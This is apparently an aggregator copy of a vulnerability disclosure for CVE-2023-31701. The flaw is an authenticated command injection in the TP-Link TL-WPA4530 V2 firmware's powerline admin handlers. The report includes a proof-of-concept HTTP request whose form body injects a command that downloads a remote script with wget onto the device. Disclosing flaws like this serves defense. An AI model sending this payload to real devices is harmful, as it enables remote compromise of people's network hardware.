Headline

CVE-2023-31701: IoT-Vulns/report.md at main · FirmRec/IoT-Vulns

TP-Link TL-WPA4530 KIT V2 (EU)_170406 and V2 (EU)_161115 is vulnerable to Command Injection via _httpRpmPlcDeviceRemove.

1 year ago

CVE

Open in Source

#vulnerability #ubuntu #linux #js #java #auth #firefox

Permalink

Cannot retrieve contributors at this time

TP-Link TL-WPA4530 V2 Vulnerability

Several command injection vulnerabilities are found in the latest version of TL-WPA4530 V2 firmware

Vulnerability Description

Reference Firmware: URL
Binary Path: /usr/bin/httpd
Entry Url: /admin/powerline
Affected Versions
- TL-WPA4530 V2 (EU)_170406
- TL-WPA4530 V2 (EU)_161115

There is a command injection vulnerability in function _httpRpmPlcDeviceAdd and _httpRpmPlcDeviceRemove. After authentication, an attacker can set devicePwd or key field in requests to launch a remote-code-execution attack.

PoC

PoC for triggering _httpRpmPlcDeviceAdd

POST /admin/powerline?form=plc_add HTTP/1.1
Host: 192.168.100.2
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 68
Origin: http://192.168.100.2
Connection: close
Referer: http://192.168.100.2/
Cookie: Authorization=XXXXXXX

xxxxxxxxxxxxxxxxxxxxxxxxxx;wget http://192.168.100.254:8000/net.sh;

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

12 months ago

12 months ago

12 months ago

12 months ago

12 months ago